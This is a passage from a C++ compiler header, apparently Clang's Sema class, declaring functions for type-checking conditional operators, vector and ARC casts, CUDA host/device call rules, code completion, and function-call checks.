Expr *LHSExpr, ExprResult &RHS, SourceLocation Loc, QualType CompoundType);
ExprResult checkPseudoObjectIncDec(Scope *S, SourceLocation OpLoc,
UnaryOperatorKind Opcode, Expr *Op);
ExprResult checkPseudoObjectAssignment(Scope *S, SourceLocation OpLoc,
BinaryOperatorKind Opcode,
Expr *LHS, Expr *RHS);
ExprResult checkPseudoObjectRValue(Expr *E);
Expr *recreateSyntacticForm(PseudoObjectExpr *E);
QualType CheckConditionalOperands( // C99 6.5.15
ExprResult &Cond, ExprResult &LHS, ExprResult &RHS,
ExprValueKind &VK, ExprObjectKind &OK, SourceLocation QuestionLoc);
QualType CXXCheckConditionalOperands( // C++ 5.16
ExprResult &cond, ExprResult &lhs, ExprResult &rhs,
ExprValueKind &VK, ExprObjectKind &OK, SourceLocation questionLoc);
QualType CheckGNUVectorConditionalTypes(ExprResult &Cond, ExprResult &LHS,
ExprResult &RHS,
SourceLocation QuestionLoc);
QualType FindCompositePointerType(SourceLocation Loc, Expr *&E1, Expr *&E2,
bool ConvertArgs = true);
QualType FindCompositePointerType(SourceLocation Loc,
ExprResult &E1, ExprResult &E2,
bool ConvertArgs = true) {
Expr *E1Tmp = E1.get(), *E2Tmp = E2.get();
QualType Composite =
FindCompositePointerType(Loc, E1Tmp, E2Tmp, ConvertArgs);
E1 = E1Tmp;
E2 = E2Tmp;
return Composite;
}
QualType FindCompositeObjCPointerType(ExprResult &LHS, ExprResult &RHS,
SourceLocation QuestionLoc);
bool DiagnoseConditionalForNull(Expr *LHSExpr, Expr *RHSExpr,
SourceLocation QuestionLoc);
void DiagnoseAlwaysNonNullPointer(Expr *E,
Expr::NullPointerConstantKind NullType,
bool IsEqual, SourceRange Range);
/// type checking for vector binary operators.
QualType CheckVectorOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc, bool IsCompAssign,
bool AllowBothBool, bool AllowBoolConversion);
QualType GetSignedVectorType(QualType V);
QualType CheckVectorCompareOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckVectorLogicalOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc);
bool areLaxCompatibleVectorTypes(QualType srcType, QualType destType);
bool isLaxVectorConversion(QualType srcType, QualType destType);
/// type checking declaration initializers (C99 6.7.8)
bool CheckForConstantInitializer(Expr *e, QualType t);
// type checking C++ declaration initializers (C++ [dcl.init]).
/// ReferenceCompareResult - Expresses the result of comparing two
/// types (cv1 T1 and cv2 T2) to determine their compatibility for the
/// purposes of initialization by reference (C++ [dcl.init.ref]p4).
enum ReferenceCompareResult {
/// Ref_Incompatible - The two types are incompatible, so direct
/// reference binding is not possible.
Ref_Incompatible = 0,
/// Ref_Related - The two types are reference-related, which means
/// that their unqualified forms (T1 and T2) are either the same
/// or T1 is a base class of T2.
Ref_Related,
/// Ref_Compatible - The two types are reference-compatible.
Ref_Compatible
};
// Fake up a scoped enumeration that still contextually converts to bool.
struct ReferenceConversionsScope {
/// The conversions that would be performed on an lvalue of type T2 when
/// binding a reference of type T1 to it, as determined when evaluating
/// whether T1 is reference-compatible with T2.
enum ReferenceConversions {
Qualification = 0x1,
NestedQualification = 0x2,
Function = 0x4,
DerivedToBase = 0x8,
ObjC = 0x10,
ObjCLifetime = 0x20,
LLVM_MARK_AS_BITMASK_ENUM(/*LargestValue=*/ObjCLifetime)
};
};
using ReferenceConversions = ReferenceConversionsScope::ReferenceConversions;
ReferenceCompareResult
CompareReferenceRelationship(SourceLocation Loc, QualType T1, QualType T2,
ReferenceConversions *Conv = nullptr);
ExprResult checkUnknownAnyCast(SourceRange TypeRange, QualType CastType,
Expr *CastExpr, CastKind &CastKind,
ExprValueKind &VK, CXXCastPath &Path);
/// Force an expression with unknown-type to an expression of the
/// given type.
ExprResult forceUnknownAnyToType(Expr *E, QualType ToType);
/// Type-check an expression that's being passed to an
/// __unknown_anytype parameter.
ExprResult checkUnknownAnyArg(SourceLocation callLoc,
Expr *result, QualType ¶mType);
// CheckVectorCast - check type constraints for vectors.
// Since vectors are an extension, there are no C standard reference for this.
// We allow casting between vectors and integer datatypes of the same size.
// returns true if the cast is invalid
bool CheckVectorCast(SourceRange R, QualType VectorTy, QualType Ty,
CastKind &Kind);
/// Prepare `SplattedExpr` for a vector splat operation, adding
/// implicit casts if necessary.
ExprResult prepareVectorSplat(QualType VectorTy, Expr *SplattedExpr);
// CheckExtVectorCast - check type constraints for extended vectors.
// Since vectors are an extension, there are no C standard reference for this.
// We allow casting between vectors and integer datatypes of the same size,
// or vectors and the element type of that vector.
// returns the cast expr
ExprResult CheckExtVectorCast(SourceRange R, QualType DestTy, Expr *CastExpr,
CastKind &Kind);
ExprResult BuildCXXFunctionalCastExpr(TypeSourceInfo *TInfo, QualType Type,
SourceLocation LParenLoc,
Expr *CastExpr,
SourceLocation RParenLoc);
enum ARCConversionResult { ACR_okay, ACR_unbridged, ACR_error };
/// Checks for invalid conversions and casts between
/// retainable pointers and other pointer kinds for ARC and Weak.
ARCConversionResult CheckObjCConversion(SourceRange castRange,
QualType castType, Expr *&op,
CheckedConversionKind CCK,
bool Diagnose = true,
bool DiagnoseCFAudited = false,
BinaryOperatorKind Opc = BO_PtrMemD
);
Expr *stripARCUnbridgedCast(Expr *e);
void diagnoseARCUnbridgedCast(Expr *e);
bool CheckObjCARCUnavailableWeakConversion(QualType castType,
QualType ExprType);
/// checkRetainCycles - Check whether an Objective-C message send
/// might create an obvious retain cycle.
void checkRetainCycles(ObjCMessageExpr *msg);
void checkRetainCycles(Expr *receiver, Expr *argument);
void checkRetainCycles(VarDecl *Var, Expr *Init);
/// checkUnsafeAssigns - Check whether +1 expr is being assigned
/// to weak/__unsafe_unretained type.
bool checkUnsafeAssigns(SourceLocation Loc, QualType LHS, Expr *RHS);
/// checkUnsafeExprAssigns - Check whether +1 expr is being assigned
/// to weak/__unsafe_unretained expression.
void checkUnsafeExprAssigns(SourceLocation Loc, Expr *LHS, Expr *RHS);
/// CheckMessageArgumentTypes - Check types in an Obj-C message send.
/// \param Method - May be null.
/// \param [out] ReturnType - The return type of the send.
/// \return true iff there were any incompatible types.
bool CheckMessageArgumentTypes(const Expr *Receiver, QualType ReceiverType,
MultiExprArg Args, Selector Sel,
ArrayRef<SourceLocation> SelectorLocs,
ObjCMethodDecl *Method, bool isClassMessage,
bool isSuperMessage, SourceLocation lbrac,
SourceLocation rbrac, SourceRange RecRange,
QualType &ReturnType, ExprValueKind &VK);
/// Determine the result of a message send expression based on
/// the type of the receiver, the method expected to receive the message,
/// and the form of the message send.
QualType getMessageSendResultType(const Expr *Receiver, QualType ReceiverType,
ObjCMethodDecl *Method, bool isClassMessage,
bool isSuperMessage);
/// If the given expression involves a message send to a method
/// with a related result type, emit a note describing what happened.
void EmitRelatedResultTypeNote(const Expr *E);
/// Given that we had incompatible pointer types in a return
/// statement, check whether we're in a method with a related result
/// type, and if so, emit a note describing what happened.
void EmitRelatedResultTypeNoteForReturn(QualType destType);
class ConditionResult {
Decl *ConditionVar;
FullExprArg Condition;
bool Invalid;
bool HasKnownValue;
bool KnownValue;
friend class Sema;
ConditionResult(Sema &S, Decl *ConditionVar, FullExprArg Condition,
bool IsConstexpr)
: ConditionVar(ConditionVar), Condition(Condition), Invalid(false),
HasKnownValue(IsConstexpr && Condition.get() &&
!Condition.get()->isValueDependent()),
KnownValue(HasKnownValue &&
!!Condition.get()->EvaluateKnownConstInt(S.Context)) {}
explicit ConditionResult(bool Invalid)
: ConditionVar(nullptr), Condition(nullptr), Invalid(Invalid),
HasKnownValue(false), KnownValue(false) {}
public:
ConditionResult() : ConditionResult(false) {}
bool isInvalid() const { return Invalid; }
std::pair<VarDecl *, Expr *> get() const {
return std::make_pair(cast_or_null<VarDecl>(ConditionVar),
Condition.get());
}
llvm::Optional<bool> getKnownValue() const {
if (!HasKnownValue)
return None;
return KnownValue;
}
};
static ConditionResult ConditionError() { return ConditionResult(true); }
enum class ConditionKind {
Boolean, ///< A boolean condition, from 'if', 'while', 'for', or 'do'.
ConstexprIf, ///< A constant boolean condition from 'if constexpr'.
Switch ///< An integral condition for a 'switch' statement.
};
ConditionResult ActOnCondition(Scope *S, SourceLocation Loc,
Expr *SubExpr, ConditionKind CK);
ConditionResult ActOnConditionVariable(Decl *ConditionVar,
SourceLocation StmtLoc,
ConditionKind CK);
DeclResult ActOnCXXConditionDeclaration(Scope *S, Declarator &D);
ExprResult CheckConditionVariable(VarDecl *ConditionVar,
SourceLocation StmtLoc,
ConditionKind CK);
ExprResult CheckSwitchCondition(SourceLocation SwitchLoc, Expr *Cond);
/// CheckBooleanCondition - Diagnose problems involving the use of
/// the given expression as a boolean condition (e.g. in an if
/// statement). Also performs the standard function and array
/// decays, possibly changing the input variable.
///
/// \param Loc - A location associated with the condition, e.g. the
/// 'if' keyword.
/// \return true iff there were any errors
ExprResult CheckBooleanCondition(SourceLocation Loc, Expr *E,
bool IsConstexpr = false);
/// ActOnExplicitBoolSpecifier - Build an ExplicitSpecifier from an expression
/// found in an explicit(bool) specifier.
ExplicitSpecifier ActOnExplicitBoolSpecifier(Expr *E);
/// tryResolveExplicitSpecifier - Attempt to resolve the explict specifier.
/// Returns true if the explicit specifier is now resolved.
bool tryResolveExplicitSpecifier(ExplicitSpecifier &ExplicitSpec);
/// DiagnoseAssignmentAsCondition - Given that an expression is
/// being used as a boolean condition, warn if it's an assignment.
void DiagnoseAssignmentAsCondition(Expr *E);
/// Redundant parentheses over an equality comparison can indicate
/// that the user intended an assignment used as condition.
void DiagnoseEqualityWithExtraParens(ParenExpr *ParenE);
/// CheckCXXBooleanCondition - Returns true if conversion to bool is invalid.
ExprResult CheckCXXBooleanCondition(Expr *CondExpr, bool IsConstexpr = false);
/// ConvertIntegerToTypeWarnOnOverflow - Convert the specified APInt to have
/// the specified width and sign. If an overflow occurs, detect it and emit
/// the specified diagnostic.
void ConvertIntegerToTypeWarnOnOverflow(llvm::APSInt &OldVal,
unsigned NewWidth, bool NewSign,
SourceLocation Loc, unsigned DiagID);
/// Checks that the Objective-C declaration is declared in the global scope.
/// Emits an error and marks the declaration as invalid if it's not declared
/// in the global scope.
bool CheckObjCDeclScope(Decl *D);
/// Abstract base class used for diagnosing integer constant
/// expression violations.
class VerifyICEDiagnoser {
public:
bool Suppress;
VerifyICEDiagnoser(bool Suppress = false) : Suppress(Suppress) { }
virtual void diagnoseNotICE(Sema &S, SourceLocation Loc, SourceRange SR) =0;
virtual void diagnoseFold(Sema &S, SourceLocation Loc, SourceRange SR);
virtual ~VerifyICEDiagnoser() { }
};
/// VerifyIntegerConstantExpression - Verifies that an expression is an ICE,
/// and reports the appropriate diagnostics. Returns false on success.
/// Can optionally return the value of the expression.
ExprResult VerifyIntegerConstantExpression(Expr *E, llvm::APSInt *Result,
VerifyICEDiagnoser &Diagnoser,
bool AllowFold = true);
ExprResult VerifyIntegerConstantExpression(Expr *E, llvm::APSInt *Result,
unsigned DiagID,
bool AllowFold = true);
ExprResult VerifyIntegerConstantExpression(Expr *E,
llvm::APSInt *Result = nullptr);
/// VerifyBitField - verifies that a bit field expression is an ICE and has
/// the correct width, and that the field type is valid.
/// Returns false on success.
/// Can optionally return whether the bit-field is of width 0
ExprResult VerifyBitField(SourceLocation FieldLoc, IdentifierInfo *FieldName,
QualType FieldTy, bool IsMsStruct,
Expr *BitWidth, bool *ZeroWidth = nullptr);
private:
unsigned ForceCUDAHostDeviceDepth = 0;
public:
/// Increments our count of the number of times we've seen a pragma forcing
/// functions to be __host__ __device__. So long as this count is greater
/// than zero, all functions encountered will be __host__ __device__.
void PushForceCUDAHostDevice();
/// Decrements our count of the number of times we've seen a pragma forcing
/// functions to be __host__ __device__. Returns false if the count is 0
/// before incrementing, so you can emit an error.
bool PopForceCUDAHostDevice();
/// Diagnostics that are emitted only if we discover that the given function
/// must be codegen'ed. Because handling these correctly adds overhead to
/// compilation, this is currently only enabled for CUDA compilations.
llvm::DenseMap<CanonicalDeclPtr<FunctionDecl>,
std::vector<PartialDiagnosticAt>>
DeviceDeferredDiags;
/// A pair of a canonical FunctionDecl and a SourceLocation. When used as the
/// key in a hashtable, both the FD and location are hashed.
struct FunctionDeclAndLoc {
CanonicalDeclPtr<FunctionDecl> FD;
SourceLocation Loc;
};
/// FunctionDecls and SourceLocations for which CheckCUDACall has emitted a
/// (maybe deferred) "bad call" diagnostic. We use this to avoid emitting the
/// same deferred diag twice.
llvm::DenseSet<FunctionDeclAndLoc> LocsWithCUDACallDiags;
/// An inverse call graph, mapping known-emitted functions to one of their
/// known-emitted callers (plus the location of the call).
///
/// Functions that we can tell a priori must be emitted aren't added to this
/// map.
llvm::DenseMap</* Callee = */ CanonicalDeclPtr<FunctionDecl>,
/* Caller = */ FunctionDeclAndLoc>
DeviceKnownEmittedFns;
/// Diagnostic builder for CUDA/OpenMP devices errors which may or may not be
/// deferred.
///
/// In CUDA, there exist constructs (e.g. variable-length arrays, try/catch)
/// which are not allowed to appear inside __device__ functions and are
/// allowed to appear in __host__ __device__ functions only if the host+device
/// function is never codegen'ed.
///
/// To handle this, we use the notion of "deferred diagnostics", where we
/// attach a diagnostic to a FunctionDecl that's emitted iff it's codegen'ed.
///
/// This class lets you emit either a regular diagnostic, a deferred
/// diagnostic, or no diagnostic at all, according to an argument you pass to
/// its constructor, thus simplifying the process of creating these "maybe
/// deferred" diagnostics.
class DeviceDiagBuilder {
public:
enum Kind {
/// Emit no diagnostics.
K_Nop,
/// Emit the diagnostic immediately (i.e., behave like Sema::Diag()).
K_Immediate,
/// Emit the diagnostic immediately, and, if it's a warning or error, also
/// emit a call stack showing how this function can be reached by an a
/// priori known-emitted function.
K_ImmediateWithCallStack,
/// Create a deferred diagnostic, which is emitted only if the function
/// it's attached to is codegen'ed. Also emit a call stack as with
/// K_ImmediateWithCallStack.
K_Deferred
};
DeviceDiagBuilder(Kind K, SourceLocation Loc, unsigned DiagID,
FunctionDecl *Fn, Sema &S);
DeviceDiagBuilder(DeviceDiagBuilder &&D);
DeviceDiagBuilder(const DeviceDiagBuilder &) = default;
~DeviceDiagBuilder();
/// Convertible to bool: True if we immediately emitted an error, false if
/// we didn't emit an error or we created a deferred error.
///
/// Example usage:
///
/// if (DeviceDiagBuilder(...) << foo << bar)
/// return ExprError();
///
/// But see CUDADiagIfDeviceCode() and CUDADiagIfHostCode() -- you probably
/// want to use these instead of creating a DeviceDiagBuilder yourself.
operator bool() const { return ImmediateDiag.hasValue(); }
template <typename T>
friend const DeviceDiagBuilder &operator<<(const DeviceDiagBuilder &Diag,
const T &Value) {
if (Diag.ImmediateDiag.hasValue())
*Diag.ImmediateDiag << Value;
else if (Diag.PartialDiagId.hasValue())
Diag.S.DeviceDeferredDiags[Diag.Fn][*Diag.PartialDiagId].second
<< Value;
return Diag;
}
private:
Sema &S;
SourceLocation Loc;
unsigned DiagID;
FunctionDecl *Fn;
bool ShowCallStack;
// Invariant: At most one of these Optionals has a value.
// FIXME: Switch these to a Variant once that exists.
llvm::Optional<SemaDiagnosticBuilder> ImmediateDiag;
llvm::Optional<unsigned> PartialDiagId;
};
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current context
/// is "used as device code".
///
/// - If CurContext is a __host__ function, does not emit any diagnostics.
/// - If CurContext is a __device__ or __global__ function, emits the
/// diagnostics immediately.
/// - If CurContext is a __host__ __device__ function and we are compiling for
/// the device, creates a diagnostic which is emitted if and when we realize
/// that the function will be codegen'ed.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in CUDA device code.
/// if (CUDADiagIfDeviceCode(Loc, diag::err_cuda_vla) << CurrentCUDATarget())
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder CUDADiagIfDeviceCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current context
/// is "used as host code".
///
/// Same as CUDADiagIfDeviceCode, with "host" and "device" switched.
DeviceDiagBuilder CUDADiagIfHostCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current
/// context is "used as device code".
///
/// - If CurContext is a `declare target` function or it is known that the
/// function is emitted for the device, emits the diagnostics immediately.
/// - If CurContext is a non-`declare target` function and we are compiling
/// for the device, creates a diagnostic which is emitted if and when we
/// realize that the function will be codegen'ed.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in NVPTX device code.
/// if (diagIfOpenMPDeviceCode(Loc, diag::err_vla_unsupported))
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder diagIfOpenMPDeviceCode(SourceLocation Loc, unsigned DiagID);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current
/// context is "used as host code".
///
/// - If CurContext is a `declare target` function or it is known that the
/// function is emitted for the host, emits the diagnostics immediately.
/// - If CurContext is a non-host function, just ignore it.
///
/// Example usage:
///
/// // Variable-length arrays are not allowed in NVPTX device code.
/// if (diagIfOpenMPHostode(Loc, diag::err_vla_unsupported))
/// return ExprError();
/// // Otherwise, continue parsing as normal.
DeviceDiagBuilder diagIfOpenMPHostCode(SourceLocation Loc, unsigned DiagID);
DeviceDiagBuilder targetDiag(SourceLocation Loc, unsigned DiagID);
enum CUDAFunctionTarget {
CFT_Device,
CFT_Global,
CFT_Host,
CFT_HostDevice,
CFT_InvalidTarget
};
/// Determines whether the given function is a CUDA device/host/kernel/etc.
/// function.
///
/// Use this rather than examining the function's attributes yourself -- you
/// will get it wrong. Returns CFT_Host if D is null.
CUDAFunctionTarget IdentifyCUDATarget(const FunctionDecl *D,
bool IgnoreImplicitHDAttr = false);
CUDAFunctionTarget IdentifyCUDATarget(const ParsedAttributesView &Attrs);
/// Gets the CUDA target for the current context.
CUDAFunctionTarget CurrentCUDATarget() {
return IdentifyCUDATarget(dyn_cast<FunctionDecl>(CurContext));
}
// CUDA function call preference. Must be ordered numerically from
// worst to best.
enum CUDAFunctionPreference {
CFP_Never, // Invalid caller/callee combination.
CFP_WrongSide, // Calls from host-device to host or device
// function that do not match current compilation
// mode.
CFP_HostDevice, // Any calls to host/device functions.
CFP_SameSide, // Calls from host-device to host or device
// function matching current compilation mode.
CFP_Native, // host-to-host or device-to-device calls.
};
/// Identifies relative preference of a given Caller/Callee
/// combination, based on their host/device attributes.
/// \param Caller function which needs address of \p Callee.
/// nullptr in case of global context.
/// \param Callee target function
///
/// \returns preference value for particular Caller/Callee combination.
CUDAFunctionPreference IdentifyCUDAPreference(const FunctionDecl *Caller,
const FunctionDecl *Callee);
/// Determines whether Caller may invoke Callee, based on their CUDA
/// host/device attributes. Returns false if the call is not allowed.
///
/// Note: Will return true for CFP_WrongSide calls. These may appear in
/// semantically correct CUDA programs, but only if they're never codegen'ed.
bool IsAllowedCUDACall(const FunctionDecl *Caller,
const FunctionDecl *Callee) {
return IdentifyCUDAPreference(Caller, Callee) != CFP_Never;
}
/// May add implicit CUDAHostAttr and CUDADeviceAttr attributes to FD,
/// depending on FD and the current compilation settings.
void maybeAddCUDAHostDeviceAttrs(FunctionDecl *FD,
const LookupResult &Previous);
public:
/// Check whether we're allowed to call Callee from the current context.
///
/// - If the call is never allowed in a semantically-correct program
/// (CFP_Never), emits an error and returns false.
///
/// - If the call is allowed in semantically-correct programs, but only if
/// it's never codegen'ed (CFP_WrongSide), creates a deferred diagnostic to
/// be emitted if and when the caller is codegen'ed, and returns true.
///
/// Will only create deferred diagnostics for a given SourceLocation once,
/// so you can safely call this multiple times without generating duplicate
/// deferred errors.
///
/// - Otherwise, returns true without emitting any diagnostics.
bool CheckCUDACall(SourceLocation Loc, FunctionDecl *Callee);
/// Set __device__ or __host__ __device__ attributes on the given lambda
/// operator() method.
///
/// CUDA lambdas declared inside __device__ or __global__ functions inherit
/// the __device__ attribute. Similarly, lambdas inside __host__ __device__
/// functions become __host__ __device__ themselves.
void CUDASetLambdaAttrs(CXXMethodDecl *Method);
/// Finds a function in \p Matches with highest calling priority
/// from \p Caller context and erases all functions with lower
/// calling priority.
void EraseUnwantedCUDAMatches(
const FunctionDecl *Caller,
SmallVectorImpl<std::pair<DeclAccessPair, FunctionDecl *>> &Matches);
/// Given a implicit special member, infer its CUDA target from the
/// calls it needs to make to underlying base/field special members.
/// \param ClassDecl the class for which the member is being created.
/// \param CSM the kind of special member.
/// \param MemberDecl the special member itself.
/// \param ConstRHS true if this is a copy operation with a const object on
/// its RHS.
/// \param Diagnose true if this call should emit diagnostics.
/// \return true if there was an error inferring.
/// The result of this call is implicit CUDA target attribute(s) attached to
/// the member declaration.
bool inferCUDATargetForImplicitSpecialMember(CXXRecordDecl *ClassDecl,
CXXSpecialMember CSM,
CXXMethodDecl *MemberDecl,
bool ConstRHS,
bool Diagnose);
/// \return true if \p CD can be considered empty according to CUDA
/// (E.2.3.1 in CUDA 7.5 Programming guide).
bool isEmptyCudaConstructor(SourceLocation Loc, CXXConstructorDecl *CD);
bool isEmptyCudaDestructor(SourceLocation Loc, CXXDestructorDecl *CD);
// \brief Checks that initializers of \p Var satisfy CUDA restrictions. In
// case of error emits appropriate diagnostic and invalidates \p Var.
//
// \details CUDA allows only empty constructors as initializers for global
// variables (see E.2.3.1, CUDA 7.5). The same restriction also applies to all
// __shared__ variables whether they are local or not (they all are implicitly
// static in CUDA). One exception is that CUDA allows constant initializers
// for __constant__ and __device__ variables.
void checkAllowedCUDAInitializer(VarDecl *VD);
/// Check whether NewFD is a valid overload for CUDA. Emits
/// diagnostics and invalidates NewFD if not.
void checkCUDATargetOverload(FunctionDecl *NewFD,
const LookupResult &Previous);
/// Copies target attributes from the template TD to the function FD.
void inheritCUDATargetAttrs(FunctionDecl *FD, const FunctionTemplateDecl &TD);
/// Returns the name of the launch configuration function. This is the name
/// of the function that will be called to configure kernel call, with the
/// parameters specified via <<<>>>.
std::string getCudaConfigureFuncName() const;
/// \name Code completion
//@{
/// Describes the context in which code completion occurs.
enum ParserCompletionContext {
/// Code completion occurs at top-level or namespace context.
PCC_Namespace,
/// Code completion occurs within a class, struct, or union.
PCC_Class,
/// Code completion occurs within an Objective-C interface, protocol,
/// or category.
PCC_ObjCInterface,
/// Code completion occurs within an Objective-C implementation or
/// category implementation
PCC_ObjCImplementation,
/// Code completion occurs within the list of instance variables
/// in an Objective-C interface, protocol, category, or implementation.
PCC_ObjCInstanceVariableList,
/// Code completion occurs following one or more template
/// headers.
PCC_Template,
/// Code completion occurs following one or more template
/// headers within a class.
PCC_MemberTemplate,
/// Code completion occurs within an expression.
PCC_Expression,
/// Code completion occurs within a statement, which may
/// also be an expression or a declaration.
PCC_Statement,
/// Code completion occurs at the beginning of the
/// initialization statement (or expression) in a for loop.
PCC_ForInit,
/// Code completion occurs within the condition of an if,
/// while, switch, or for statement.
PCC_Condition,
/// Code completion occurs within the body of a function on a
/// recovery path, where we do not have a specific handle on our position
/// in the grammar.
PCC_RecoveryInFunction,
/// Code completion occurs where only a type is permitted.
PCC_Type,
/// Code completion occurs in a parenthesized expression, which
/// might also be a type cast.
PCC_ParenthesizedExpression,
/// Code completion occurs within a sequence of declaration
/// specifiers within a function, method, or block.
PCC_LocalDeclarationSpecifiers
};
void CodeCompleteModuleImport(SourceLocation ImportLoc, ModuleIdPath Path);
void CodeCompleteOrdinaryName(Scope *S,
ParserCompletionContext CompletionContext);
void CodeCompleteDeclSpec(Scope *S, DeclSpec &DS,
bool AllowNonIdentifiers,
bool AllowNestedNameSpecifiers);
struct CodeCompleteExpressionData;
void CodeCompleteExpression(Scope *S,
const CodeCompleteExpressionData &Data);
void CodeCompleteExpression(Scope *S, QualType PreferredType,
bool IsParenthesized = false);
void CodeCompleteMemberReferenceExpr(Scope *S, Expr *Base, Expr *OtherOpBase,
SourceLocation OpLoc, bool IsArrow,
bool IsBaseExprStatement,
QualType PreferredType);
void CodeCompletePostfixExpression(Scope *S, ExprResult LHS,
QualType PreferredType);
void CodeCompleteTag(Scope *S, unsigned TagSpec);
void CodeCompleteTypeQualifiers(DeclSpec &DS);
void CodeCompleteFunctionQualifiers(DeclSpec &DS, Declarator &D,
const VirtSpecifiers *VS = nullptr);
void CodeCompleteBracketDeclarator(Scope *S);
void CodeCompleteCase(Scope *S);
/// Reports signatures for a call to CodeCompleteConsumer and returns the
/// preferred type for the current argument. Returned type can be null.
QualType ProduceCallSignatureHelp(Scope *S, Expr *Fn, ArrayRef<Expr *> Args,
SourceLocation OpenParLoc);
QualType ProduceConstructorSignatureHelp(Scope *S, QualType Type,
SourceLocation Loc,
ArrayRef<Expr *> Args,
SourceLocation OpenParLoc);
QualType ProduceCtorInitMemberSignatureHelp(Scope *S, Decl *ConstructorDecl,
CXXScopeSpec SS,
ParsedType TemplateTypeTy,
ArrayRef<Expr *> ArgExprs,
IdentifierInfo *II,
SourceLocation OpenParLoc);
void CodeCompleteInitializer(Scope *S, Decl *D);
/// Trigger code completion for a record of \p BaseType. \p InitExprs are
/// expressions in the initializer list seen so far and \p D is the current
/// Designation being parsed.
void CodeCompleteDesignator(const QualType BaseType,
llvm::ArrayRef<Expr *> InitExprs,
const Designation &D);
void CodeCompleteAfterIf(Scope *S);
void CodeCompleteQualifiedId(Scope *S, CXXScopeSpec &SS, bool EnteringContext,
bool IsUsingDeclaration, QualType BaseType,
QualType PreferredType);
void CodeCompleteUsing(Scope *S);
void CodeCompleteUsingDirective(Scope *S);
void CodeCompleteNamespaceDecl(Scope *S);
void CodeCompleteNamespaceAliasDecl(Scope *S);
void CodeCompleteOperatorName(Scope *S);
void CodeCompleteConstructorInitializer(
Decl *Constructor,
ArrayRef<CXXCtorInitializer *> Initializers);
void CodeCompleteLambdaIntroducer(Scope *S, LambdaIntroducer &Intro,
bool AfterAmpersand);
void CodeCompleteObjCAtDirective(Scope *S);
void CodeCompleteObjCAtVisibility(Scope *S);
void CodeCompleteObjCAtStatement(Scope *S);
void CodeCompleteObjCAtExpression(Scope *S);
void CodeCompleteObjCPropertyFlags(Scope *S, ObjCDeclSpec &ODS);
void CodeCompleteObjCPropertyGetter(Scope *S);
void CodeCompleteObjCPropertySetter(Scope *S);
void CodeCompleteObjCPassingType(Scope *S, ObjCDeclSpec &DS,
bool IsParameter);
void CodeCompleteObjCMessageReceiver(Scope *S);
void CodeCompleteObjCSuperMessage(Scope *S, SourceLocation SuperLoc,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression);
void CodeCompleteObjCClassMessage(Scope *S, ParsedType Receiver,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression,
bool IsSuper = false);
void CodeCompleteObjCInstanceMessage(Scope *S, Expr *Receiver,
ArrayRef<IdentifierInfo *> SelIdents,
bool AtArgumentExpression,
ObjCInterfaceDecl *Super = nullptr);
void CodeCompleteObjCForCollection(Scope *S,
DeclGroupPtrTy IterationVar);
void CodeCompleteObjCSelector(Scope *S,
ArrayRef<IdentifierInfo *> SelIdents);
void CodeCompleteObjCProtocolReferences(
ArrayRef<IdentifierLocPair> Protocols);
void CodeCompleteObjCProtocolDecl(Scope *S);
void CodeCompleteObjCInterfaceDecl(Scope *S);
void CodeCompleteObjCSuperclass(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCImplementationDecl(Scope *S);
void CodeCompleteObjCInterfaceCategory(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCImplementationCategory(Scope *S,
IdentifierInfo *ClassName,
SourceLocation ClassNameLoc);
void CodeCompleteObjCPropertyDefinition(Scope *S);
void CodeCompleteObjCPropertySynthesizeIvar(Scope *S,
IdentifierInfo *PropertyName);
void CodeCompleteObjCMethodDecl(Scope *S, Optional<bool> IsInstanceMethod,
ParsedType ReturnType);
void CodeCompleteObjCMethodDeclSelector(Scope *S,
bool IsInstanceMethod,
bool AtParameterName,
ParsedType ReturnType,
ArrayRef<IdentifierInfo *> SelIdents);
void CodeCompleteObjCClassPropertyRefExpr(Scope *S, IdentifierInfo &ClassName,
SourceLocation ClassNameLoc,
bool IsBaseExprStatement);
void CodeCompletePreprocessorDirective(bool InConditional);
void CodeCompleteInPreprocessorConditionalExclusion(Scope *S);
void CodeCompletePreprocessorMacroName(bool IsDefinition);
void CodeCompletePreprocessorExpression();
void CodeCompletePreprocessorMacroArgument(Scope *S,
IdentifierInfo *Macro,
MacroInfo *MacroInfo,
unsigned Argument);
void CodeCompleteIncludedFile(llvm::StringRef Dir, bool IsAngled);
void CodeCompleteNaturalLanguage();
void CodeCompleteAvailabilityPlatformName();
void GatherGlobalCodeCompletions(CodeCompletionAllocator &Allocator,
CodeCompletionTUInfo &CCTUInfo,
SmallVectorImpl<CodeCompletionResult> &Results);
//@}
//===--------------------------------------------------------------------===//
// Extra semantic analysis beyond the C type system
public:
SourceLocation getLocationOfStringLiteralByte(const StringLiteral *SL,
unsigned ByteNo) const;
private:
void CheckArrayAccess(const Expr *BaseExpr, const Expr *IndexExpr,
const ArraySubscriptExpr *ASE=nullptr,
bool AllowOnePastEnd=true, bool IndexNegated=false);
void CheckArrayAccess(const Expr *E);
// Used to grab the relevant information from a FormatAttr and a
// FunctionDeclaration.
struct FormatStringInfo {
unsigned FormatIdx;
unsigned FirstDataArg;
bool HasVAListArg;
};
static bool getFormatStringInfo(const FormatAttr *Format, bool IsCXXMember,
FormatStringInfo *FSI);
bool CheckFunctionCall(FunctionDecl *FDecl, CallExpr *TheCall,
const FunctionProtoType *Proto);
bool CheckObjCMethodCall(ObjCMethodDecl *Method, SourceLocation loc,
ArrayRef<const Expr *> Args);
bool CheckPointerCall(NamedDecl *NDecl, CallExpr *TheCall,
const FunctionProtoType *Proto);
bool CheckOtherCall(CallExpr *TheCall, const FunctionProtoType *Proto);
